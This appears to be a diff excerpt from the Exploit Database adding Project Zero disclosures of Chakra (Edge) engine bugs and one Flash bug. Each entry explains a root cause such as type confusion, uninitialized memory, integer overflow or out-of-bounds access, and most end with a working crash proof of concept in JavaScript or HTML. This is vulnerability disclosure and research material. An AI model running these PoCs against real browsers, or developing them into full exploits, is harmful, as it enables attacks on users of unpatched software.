00007ff9`f0ff80cc : 00000038`8f1fc2a0 0000015e`3c7a0000 00000038`8f1fc4a0 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ff9`f0ff7be1 : 0000015e`2c560480 00000038`8f1fc680 0000015e`3c7e0fc2 00000038`8f1fc698 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000015e`3c7e0fc2 : 00000038`8f1fc6d0 00000000`00000000 00000000`00000000 00007ff9`f10d6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ff9`f10d6be3 : 0000015e`2c560480 00000000`00000000 00000000`00000000 00000000`00000000 : 0x15e`3c7e0fc2
00007ff9`f0fc6bf3 : 0000015e`2932a120 00000000`00000000 0000015e`29352a10 00007ff9`f0fda837 : chakra!amd64_CallFunction+0x93
00007ff9`f0ff1810 : 0000015e`2c560480 00007ff9`f10d6df0 00000038`8f1fc7d0 0000015e`2932d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ff9`f0ff0a37 : 0000015e`2c560480 00000038`8f1fc8c0 0000015e`2932d110 00007ffa`11697100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ff9`f10b907e : 0000015e`2c560480 00000038`8f1fc920 0000015e`2932d110 0000015e`2932da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ff9`f101cd54 : 0000015e`2c560480 00000038`8f1fc960 00000000`00000000 00000038`8f1fc978 : chakra!ScriptSite::CallRootFunction+0x6a
00007ff9`f0fb1b49 : 0000015e`2932d000 0000015e`2c560480 00000038`8f1fca10 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ff9`f0fb2e8e : 0000015e`29329cd0 00000038`8f1fcf18 00000038`8f1fcf50 00000038`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ff9`f0fb3121 : 0000015e`29329cd0 0000015e`29ce82e4 00000000`00000000 00000156`270b4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ff9`f1a53c75 : 0000015e`29329d20 0000015e`29ce82e4 00000156`000000f1 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ff9`f1a53abe : 00000000`00000000 00000038`8f1fcde9 00000156`270b4260 00000156`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ff9`f1a535d7 : 00000000`00000000 00000156`270b4260 00000156`2703c1c0 00000156`270b41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ff9`f1a52f07 : 00000156`27050c01 00000156`270ac100 00000156`00000082 00007ff9`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ff9`f1b12f8d : 00000000`ffffffff 00000156`2703c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ff9`f19543d4 : 00000000`00000000 00000156`2708c440 00000000`00000001 00007ff9`f1b0ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ff9`f19534a1 : 00000156`27050c00 00000000`00000000 00000156`27050c00 00000156`2702c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ff9`f1b0d23b : 00000000`00026e8b 00000156`27020000 00000156`270800b0 00000156`2702c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ff9`f1b0d11f : 00000156`2702c8c0 00000000`00026e8b 0000015e`29ce82e0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ff9`f1b0cfd3 : 00000156`27020000 00000000`09806f01 00000000`00000002 00000156`27061680 : edgehtml!PostManExecute+0x63
00007ff9`f1b0ce6d : 00000156`2702c8c0 00000000`09806ff9 0000015e`00000000 00007ffa`083a4779 : edgehtml!PostManResume+0xa3
00007ff9`f1b1b353 : 00000156`27048600 0000015e`29c26b50 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ff9`f1af50db : 00000156`270282d0 0000015e`29325463 0000015e`29302200 00000038`8f1fd4a0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ff9`f1981706 : 0000015e`29302728 00000156`27061680 0000015e`29302260 00000038`8f1fd4d0 : edgehtml!GWndAsyncTask::Run+0x1b
00007ff9`f1aca860 : 00000000`16389c44 00000156`270616e0 00000156`270800b0 00007ff9`f1a29138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ff9`f1aca683 : 0000015e`29c26b50 00000000`00000000 00000000`00000002 00000156`27028170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ff9`f19822b3 : 00000038`8f1fd980 00000000`00008002 00000156`27028170 00007ffa`10d847df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ff9`f19807a5 : 00000000`00008002 00000156`27020000 00000156`00000000 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffa`10d6bc50 : 00000000`00e80380 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffa`10d6b5cf : 00000156`276d4470 00007ff9`f1980680 00000000`00e80380 00000000`00e80380 : USER32!UserCallWinProcCheckWow+0x280
00007ff9`f3686d0e : 00000038`8f1fd920 00000000`00000000 00000156`26f58170 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ff9`f369eecb : 00000000`00000000 00000000`00000001 00000156`27229e70 00000156`26fd40f0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ff9`ff58b4a8 : 00000000`00000000 00000156`27228f80 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffa`11a02774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffa`13770d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
-->
<html>
<head>
<title> POC </title>
</head>
<script>
var a=[];
a.length=0xffff-1;
a.fill('0x42424242');
var s='{';
for(var i=0; i<0x8000-1; i++){
s+= 'a'+i+':0,'
};
s+= 'b:0';
s+= '}';
var c='function Car(){}; var car=new Car(' + a.join() + ',' + s + ')';
eval(c);
</script>
</html>

48
platforms/windows/dos/42469.html Executable file
View file

@ -0,0 +1,48 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1271
When Chakra fails to link an asmjs module, it tries to re-parse the failed-to-link asmjs function to treat it as a normal javascript function. But it incorrectly handles the case where the function is a class. It starts to parse from the start of the class declaration instead of the constructor. So it may result in binding incorrect information to the constructor. In the PoC, it binds the information of the method "f"("f2" in the latest release version of Edge) to the constructor.
The PoC hits the following assertion in the debug build.
FuncInfo * ByteCodeGenerator::StartBindFunction(const char16 *name, uint nameLength, uint shortNameOffset, bool* pfuncExprWithName, ParseNode *pnode, Js::ParseableFunctionInfo * reuseNestedFunc)
{
bool funcExprWithName;
Js::ParseableFunctionInfo* parseableFunctionInfo = nullptr;
Js::AutoRestoreFunctionInfo autoRestoreFunctionInfo(reuseNestedFunc, reuseNestedFunc ? reuseNestedFunc->GetOriginalEntryPoint() : nullptr);
if (this->pCurrentFunction &&
this->pCurrentFunction->IsFunctionParsed())
{
Assert(this->pCurrentFunction->StartInDocument() == pnode->ichMin); <<------- here
...
}
...
}
"this->pCurrentFunction" is the consturctor, but "pnode" refers to the method "f".
PoC:
-->
class MyClass {
f(a) {
print(a);
}
constructor() {
'use asm';
function f(v) {
v = v | 0;
return v | 0;
}
return f;
}
f2(a) {
print(a);
}
}
MyClass(1);

46
platforms/windows/dos/42470.html Executable file
View file

@ -0,0 +1,46 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1277
PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like "PushPopFrameHelper holder(...)", but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function.
Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule()
{
...
PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress());
...
}
It pushes "newInstance" and immediately pop it.
The PoC will crash in the following code.
void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind)
{
...
Js::InterpreterStackFrame * interpreterFrame = executeFunction->GetScriptContext()->GetThreadContext()->GetLeafInterpreterFrame(); <<-- Invalid stack frame object
loopHeader = executeFunction->GetLoopHeader(interpreterFrame->GetCurrentLoopNum()); <<-- interpreterFrame->GetCurrentLoopNum() == -1
...
}
PoC:
-->
function asmModule() {
'use asm';
let a = [1, 2, 3, 4];
for (let i = 0; i < 0x100000; i++) { // JIT
a[0] = 1;
if (i === 0x30000) {
a[0] = {}; // the array type changed, bailout!!
}
}
function f(v) {
v = v | 0;
return v | 0;
}
return f;
}
asmModule(1);

95
platforms/windows/dos/42471.html Executable file
View file

@ -0,0 +1,95 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1281
Chakra implemented the reuse of deleted properties of an unordered dictionary object with the following code.
bool SimpleDictionaryUnorderedTypeHandler::TryReuseDeletedPropertyIndex(
DynamicObject *const object,
TPropertyIndex *const propertyIndex)
{
if(deletedPropertyIndex == PropertyIndexRanges<TPropertyIndex>::NoSlots)
{
return false;
}
*propertyIndex = deletedPropertyIndex;
deletedPropertyIndex = static_cast<TPropertyIndex>(TaggedInt::ToInt32(object->GetSlot(deletedPropertyIndex)));
return true;
}
bool SimpleDictionaryUnorderedTypeHandle::TryUndeleteProperty(
DynamicObject *const object,
const TPropertyIndex existingPropertyIndex,
TPropertyIndex *const propertyIndex)
{
...
if(!IsReusablePropertyIndex(existingPropertyIndex))
{
return false;
}
...
const bool reused = TryReuseDeletedPropertyIndex(object, propertyIndex);
Assert(reused);
...
return true;
}
BOOL SimpleDictionaryTypeHandlerBase<TPropertyIndex, TMapKey, IsNotExtensibleSupported>::SetPropertyFromDescriptor(DynamicObject* instance, PropertyId propertyId, TPropertyKey propertyKey, SimpleDictionaryPropertyDescriptor<TPropertyIndex>* descriptor, Var value, PropertyOperationFlags flags, PropertyValueInfo* info)
{
...
if (descriptor->Attributes & PropertyDeleted)
{
...
if(isUnordered)
{
TPropertyIndex propertyIndex;
if(AsUnordered()->TryUndeleteProperty(instance, descriptor->propertyIndex, &propertyIndex))
{
Assert(PropertyRecordStringHashComparer<TMapKey>::Equals(propertyMap->GetKeyAt(propertyIndex), propertyRecord));
descriptor = propertyMap->GetReferenceAt(propertyIndex);
}
}
if (IsNotExtensibleSupported)
{
bool isForce = (flags & PropertyOperation_Force) != 0;
if (!isForce)
{
if (!this->VerifyIsExtensible(scriptContext, throwIfNotExtensible))
{
return FALSE; <<------ (a)
}
}
}
...
descriptor->Attributes = PropertyDynamicTypeDefaults;
...
}
...
}
"TryUndeleteProperty" is calling "TryReuseDeletedPropertyIndex" on the assumption that the return value of it is always true. But if the method exits at (a), "descriptor->Attributes" will remain with "PropertyDeleted" set, and therefore we can call "TryUndeleteProperty" again and again until "deletedPropertyIndex" becames "NoSlots" which makes "TryReuseDeletedPropertyIndex" return false.
In the debug build, the PoC hits the assertion "Assert(reused);". In the release build, "propertyIndex" remains uninitialized, this will cause a memory corruption.
PoC:
-->
const kNumProperties = 100;
let o = {};
for (let i = 0; i < kNumProperties; ++i)
o['a' + i] = i;
Object.preventExtensions(o); // IsNotExtensibleSupported && !this->VerifyIsExtensible
for (let i = 0; i < kNumProperties; ++i)
delete o['a' + i];
for (let i = 0; i < 0x1000; ++i)
o['a0'] = 1; // calling TryUndeleteProperty again again

45
platforms/windows/dos/42472.html Executable file
View file

@ -0,0 +1,45 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1283
"EmitAssignment" doesn't call "EmitSuperMethodBegin" that initializes the "this" register for the case when the super keyword is used.
Here's the generated bytecode for the lambda function in the PoC. R5 is uninitialized.
Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7])
9 locals (1 temps from R8), 1 inline cache
Constant Table:
======== =====
R1 LdRoot
R2 Ld_A (undefined)
R3 LdC_A_I4 int:1
0000 ProfiledLdEnvSlot R6 = [1][4] <0>
000c ProfiledLdEnvSlot R4 = [1][3] <1>
Line 28: super.a = 1;
Col 13: ^
0018 LdHomeObjProto R8 R4
001d ProfiledStSuperFld R8.(this=R5) = R3 #0 <0>
0025 LdUndef R0
Line 29: }
Col 9: ^
0027 Ret
PoC:
-->
class Parent {
};
class Child extends Parent {
constructor() {
(() => {
super.a = 10; // Implicitly use the "this" register. So it must be initialized.
})();
}
};
new Child();

68
platforms/windows/dos/42473.html Executable file
View file

@ -0,0 +1,68 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1290
I think the fix for #1045 is incorrect.
Here's the original PoC.
'use strict';
function func(a, b, c) {
a[0] = 1.2;
b[0] = c;
a[1] = 2.2;
a[0] = 2.3023e-320;
}
function main() {
var a = [1.1, 2.2];
var b = new Uint32Array(100);
// force to optimize
for (var i = 0; i < 0x10000; i++)
func(a, b, i);
func(a, b, {valueOf: () => {
a[0] = {};
return 0;
}});
a[0].toString();
}
main();
I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.
PoC:
-->
'use strict';
function func(a, b, c) {
a[0] = 1.2;
b[0] = c;
a[1] = 2.2;
a[0] = 2.3023e-320;
}
function main() {
var a = [1.1, 2.2];
var b = new Uint32Array(0); // <<--------- 100 -> 0
// force to optimize
for (var i = 0; i < 0x10000; i++)
func(a, b, i);
func(a, b, {valueOf: () => {
a[0] = {};
return 0;
}});
a[0].toString();
}
main();

87
platforms/windows/dos/42474.html Executable file
View file

@ -0,0 +1,87 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1292
Let's assume that the following method is called with "firstPromotedItemIsSpreadable = true", and "args" has two elements an array and an integer 0x1234 sequentially.
In the first loop, "aItem" is an array, and "firstPromotedItemIsSpreadable" remains true because the condition for the fast path is satisfied. In the second loop, "aItem" is 0x1234 and not spreadable, but the code at (a) makes the "spreadable" variable true, thus it reaches (b) and a type confusion occurs.
template<typename T>
void JavascriptArray::ConcatArgs(RecyclableObject* pDestObj, TypeId* remoteTypeIds,
Js::Arguments& args, ScriptContext* scriptContext, uint start, uint startIdxDest,
BOOL firstPromotedItemIsSpreadable, BigIndex firstPromotedItemLength, bool spreadableCheckedAndTrue)
{
JS_REENTRANCY_LOCK(jsReentLock, scriptContext->GetThreadContext());
JavascriptArray* pDestArray = nullptr;
if (JavascriptArray::Is(pDestObj))
{
pDestArray = JavascriptArray::FromVar(pDestObj);
}
T idxDest = startIdxDest;
for (uint idxArg = start; idxArg < args.Info.Count; idxArg++)
{
Var aItem = args[idxArg];
bool spreadable = spreadableCheckedAndTrue;
if (!spreadable && scriptContext->GetConfig()->IsES6IsConcatSpreadableEnabled())
{
// firstPromotedItemIsSpreadable is ONLY used to resume after a type promotion from uint32 to uint64
// we do this because calls to IsConcatSpreadable are observable (a big deal for proxies) and we don't
// want to do the work a second time as soon as we record the length we clear the flag.
JS_REENTRANT(jsReentLock, spreadable = firstPromotedItemIsSpreadable || JavascriptOperators::IsConcatSpreadable(aItem)); <<------------------------- (a)
if (!spreadable)
{
JS_REENTRANT(jsReentLock, JavascriptArray::SetConcatItem<T>(aItem, idxArg, pDestArray, pDestObj, idxDest, scriptContext));
++idxDest;
continue;
}
}
else
{
spreadableCheckedAndTrue = false; // if it was `true`, reset after the first use
}
if (pDestArray && JavascriptArray::IsDirectAccessArray(aItem) && JavascriptArray::IsDirectAccessArray(pDestArray)
&& BigIndex(idxDest + JavascriptArray::FromVar(aItem)->length).IsSmallIndex() && !JavascriptArray::FromVar(aItem)->IsFillFromPrototypes()) // Fast path
{
...
}
else
{
// Flatten if other array or remote array (marked with TypeIds_Array)
if (DynamicObject::IsAnyArray(aItem) || remoteTypeIds[idxArg] == TypeIds_Array || spreadable)
{
<<-------------------------------------------------------------------------------------------------- (b)
//CONSIDER: enumerating remote array instead of walking all indices
BigIndex length;
if (firstPromotedItemIsSpreadable)
{
firstPromotedItemIsSpreadable = false;
length = firstPromotedItemLength;
}
else
{
JS_REENTRANT(jsReentLock, length = OP_GetLength(aItem, scriptContext));
}
...
RecyclableObject* itemObject = RecyclableObject::FromVar(aItem); <<----------------------- TYPE CONFUSION
...
}
...
}
...
}
}
PoC:
-->
let a = [0];
let b = [0];
b.__defineGetter__(Symbol.isConcatSpreadable, () => {
b[0] = 1.2;
return true;
});
let res = a.concat(b, 0x1234);
print(res);

58
platforms/windows/dos/42475.html Executable file
View file

@ -0,0 +1,58 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1295
Here's the method.
Var JavascriptFunction::EntryCall(RecyclableObject* function, CallInfo callInfo, ...)
{
PROBE_STACK(function->GetScriptContext(), Js::Constants::MinStackDefault);
RUNTIME_ARGUMENTS(args, callInfo);
ScriptContext* scriptContext = function->GetScriptContext();
Assert(!(callInfo.Flags & CallFlags_New));
///
/// Check Argument[0] has internal [[Call]] property
/// If not, throw TypeError
///
if (args.Info.Count == 0 || !JavascriptConversion::IsCallable(args[0]))
{
JavascriptError::ThrowTypeError(scriptContext, JSERR_This_NeedFunction, _u("Function.prototype.call"));
}
RecyclableObject *pFunc = RecyclableObject::FromVar(args[0]);
if (args.Info.Count == 1)
{
args.Values[0] = scriptContext->GetLibrary()->GetUndefined();
}
else
{
///
/// Remove function object from the arguments and pass the rest
///
for (uint i = 0; i < args.Info.Count - 1; ++i)
{
args.Values[i] = args.Values[i + 1];
}
args.Info.Count = args.Info.Count - 1;
}
///
/// Call the [[Call]] method on the function object
///
return JavascriptFunction::CallFunction<true>(pFunc, pFunc->GetEntryPoint(), args);
}
Chakra uses the first value of "args.Values" as "this" and "args.Info.Count - 1" as the length of the arguments. So "args.Info.Count" must always be 1 or greater.
But the problem is that the method decrements "args.Info.Count" by one without considering the flag "CallFlags_ExtraArg". If the flag is set, the value of "args.Info.Count" will be decremented again in the next routine(ArgumentReader::AdjustArguments) because the last value of the arguments is not used as an actual argument. Therefore, the value of "args.Info.Count" becomes 0.
PoC:
-->
function f() {
print(arguments);
}
let call = new Proxy(Function.prototype.call, {}); // proxy calls set the flag
call.call(f);

49
platforms/windows/dos/42476.html Executable file
View file

@ -0,0 +1,49 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1297
Here's a snippet of "ParseVariableDeclaration" which is used for parsing declarations.
template<bool buildAST>
ParseNodePtr Parser::ParseVariableDeclaration(
tokens declarationType, charcount_t ichMin,
BOOL fAllowIn/* = TRUE*/,
BOOL* pfForInOk/* = nullptr*/,
BOOL singleDefOnly/* = FALSE*/,
BOOL allowInit/* = TRUE*/,
BOOL isTopVarParse/* = TRUE*/,
BOOL isFor/* = FALSE*/,
BOOL* nativeForOk /*= nullptr*/)
{
...
if (pid == wellKnownPropertyPids.arguments && m_currentNodeFunc)
{
// This var declaration may change the way an 'arguments' identifier in the function is resolved
if (declarationType == tkVAR)
{
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_varDeclaration;
}
else
{
if (GetCurrentBlockInfo()->pnodeBlock->sxBlock.blockType == Function)
{
// Only override arguments if we are at the function block level.
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenByDecl;
}
}
}
...
}
"m_currentNodeFunc" is only replaced when "buildAST" is true. So I think it's not supposed to use "m_currentNodeFunc" when "buildAST" is false. But the above code is using it regardless of "buildAST". So it may change a wrong function's "grfpn" flag. What I noticed is the "PNodeFlags::fpnArguments_overriddenByDecl" flag which makes the function's arguments uninitialized.
PoC:
-->
function f() {
({a = () => {
let arguments;
}} = 1);
arguments.x;
}
f();

38
platforms/windows/dos/42477.html Executable file
View file

@ -0,0 +1,38 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
Similar to the issue #1297 . But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
{
...
if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
{
...
// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
{
Assert(lexNode->IsVarLetOrConst());
UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
lexNode->sxVar.sym->SetSymbolType(STFormal);
if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
{
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE
}
}
...
...
}
PoC:
-->
function f() {
({a = ([arguments]) => {
}} = 1);
arguments.x;
}
f();

29
platforms/windows/dos/42478.html Executable file
View file

@ -0,0 +1,29 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1315
The bytecode generator uses the "EmitNew" function to handle new operators.
Here's the code how the function checks for integer overflow.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
Js::ArgSlot argCount = pnode->sxCall.argCount;
argCount++; // include "this"
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
...
}
"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.
PoC:
-->
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');

38
platforms/windows/dos/42479.html Executable file
View file

@ -0,0 +1,38 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1316
Coincidentally, Microsoft released the patch for the issue 1290 the day after I reported it. But it seems they fixed it incorrectly again.
This time, "func(a, b, i);" is replaced with "func(a, b, {});".
PoC:
-->
'use strict';
function func(a, b, c) {
a[0] = 1.2;
b[0] = c;
a[1] = 2.2;
a[0] = 2.3023e-320;
}
function main() {
let a = [1.1, 2.2];
let b = new Uint32Array(100);
for (let i = 0; i < 0x1000; i++)
func(a, b, {}); // <<---------- REPLACED
func(a, b, {valueOf: () => {
a[0] = {};
return 0;
}});
a[0].toString();
}
main();
// Tested on Microsoft Edge 40.15063.0.0(Insider Preview).

7
platforms/windows/dos/42480.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1320
The attached fuzzed swf file causes the traits of an ActionScript object to be accessed out of bounds. This can probably lead to exploitable type confusion.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42480.zip

177
platforms/windows/dos/42481.js Executable file
View file

@ -0,0 +1,177 @@
// The attached JavaScript file causes an out-of-bounds access of the source buffer when fetching the source for one of the functions during delayed compilation. The out-of-bounds value is then treated as the pointer to the source. This is likely an exploitable condition.
// In the debug build of Chakra, this script hits the following assert:
// ASSERTION 19041: (/home/user/test_everywhere/ChakraCore/lib/Common/DataStructures/List.h, line 329) index >= 0 && index < this->count
// Failure: (index >= 0 && index < this->count)
// Illegal instruction (core dumped)
// The attached script is a test case from the v8 (Chrome) test repository, minimized to show the issue.
print = function(){};
(function () {
assertPromiseResult = function(promise, success, fail) {
if (!success) success = () => {};
failWithMessage = (msg) => eval("print(msg)");
if (!fail) {
fail = result => failWithMessage("assertPromiseResult failed: " + result);
}
var test_promise =
promise.then(
result => {
try {
success(result);
} catch (e) {
failWithMessage(e);
}
},
result => {
fail(result);
}
)
.then((x)=> {
if (--promiseTestCount == 0) testRunner.notifyDone();
});
if (!promiseTestChain) promiseTestChain = Promise.resolve();
// waitUntilDone is idempotent.
testRunner.waitUntilDone();
++promiseTestCount;
return promiseTestChain.then(test_promise);
};
assertUnoptimized = function assertUnoptimized(fun, sync_opt, name_opt) {
if (sync_opt === undefined) sync_opt = "";
var opt_status = OptimizationStatus(fun, sync_opt);
// Tests that use assertOptimized() do not make sense if --always-opt
// option is provided. Such tests must add --no-always-opt to flags comment.
assertFalse((opt_status & V8OptimizationStatus.kAlwaysOptimize) !== 0,
"test does not make sense with --always-opt");
assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0, name_opt);
if ((opt_status & V8OptimizationStatus.kMaybeDeopted) !== 0) {
// When --deopt-every-n-times flag is specified it's no longer guaranteed
// that particular function is still deoptimized, so keep running the test
// to stress test the deoptimizer.
return;
}
assertFalse((opt_status & V8OptimizationStatus.kOptimized) !== 0, name_opt);
}
assertOptimized = function assertOptimized(fun, sync_opt, name_opt) {
if (sync_opt === undefined) sync_opt = "";
var opt_status = OptimizationStatus(fun, sync_opt);
// Tests that use assertOptimized() do not make sense if --no-opt
// option is provided. Such tests must add --opt to flags comment.
assertFalse((opt_status & V8OptimizationStatus.kNeverOptimize) !== 0,
"test does not make sense with --no-opt");
assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0, name_opt);
if ((opt_status & V8OptimizationStatus.kMaybeDeopted) !== 0) {
// When --deopt-every-n-times flag is specified it's no longer guaranteed
// that particular function is still optimized, so keep running the test
// to stress test the deoptimizer.
return;
}
assertTrue((opt_status & V8OptimizationStatus.kOptimized) !== 0, name_opt);
}
isNeverOptimize = function isNeverOptimize() {
var opt_status = OptimizationStatus(undefined, "");
return (opt_status & V8OptimizationStatus.kNeverOptimize) !== 0;
}
isAlwaysOptimize = function isAlwaysOptimize() {
var opt_status = OptimizationStatus(undefined, "");
return (opt_status & V8OptimizationStatus.kAlwaysOptimize) !== 0;
}
isInterpreted = function isInterpreted(fun) {
var opt_status = OptimizationStatus(fun, "");
assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
"not a function");
return (opt_status & V8OptimizationStatus.kOptimized) === 0 &&
(opt_status & V8OptimizationStatus.kInterpreted) !== 0;
}
isOptimized = function isOptimized(fun) {
var opt_status = OptimizationStatus(fun, "");
assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
"not a function");
return (opt_status & V8OptimizationStatus.kOptimized) !== 0;
}
isCrankshafted = function isCrankshafted(fun) {
var opt_status = OptimizationStatus(fun, "");
assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
"not a function");
return (opt_status & V8OptimizationStatus.kOptimized) !== 0 &&
(opt_status & V8OptimizationStatus.kTurboFanned) === 0;
}
isTurboFanned = function isTurboFanned(fun) {
var opt_status = OptimizationStatus(fun, "");
assertTrue((opt_status & V8OptimizationStatus.kIsFunction) !== 0,
"not a function");
return (opt_status & V8OptimizationStatus.kOptimized) !== 0 &&
(opt_status & V8OptimizationStatus.kTurboFanned) !== 0;
}
})();
// Copyright 2015 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Flags: --allow-natives-syntax
assertEquals = print;
var m = (function() {
"use asm";
function f(x) {
return x < 0;
}
function g(x) {
return 0 < x;
}
return { f: f, g: g };
})();
var f = m.f;
var g = m.g;
var counter = 0;
function deopt(f) {
return {
toString : function() {
print(f);
counter++;
return "2";
}
};
}
assertEquals(false, f(deopt(f)));
assertEquals(1, counter);
assertEquals(true, g(deopt(g)));
assertEquals(2, counter);
print(f);
assertEquals(false, f(deopt(f)));
assertEquals(3, counter);
print(g);
assertEquals(true, g(deopt(g)));
assertEquals(4, counter);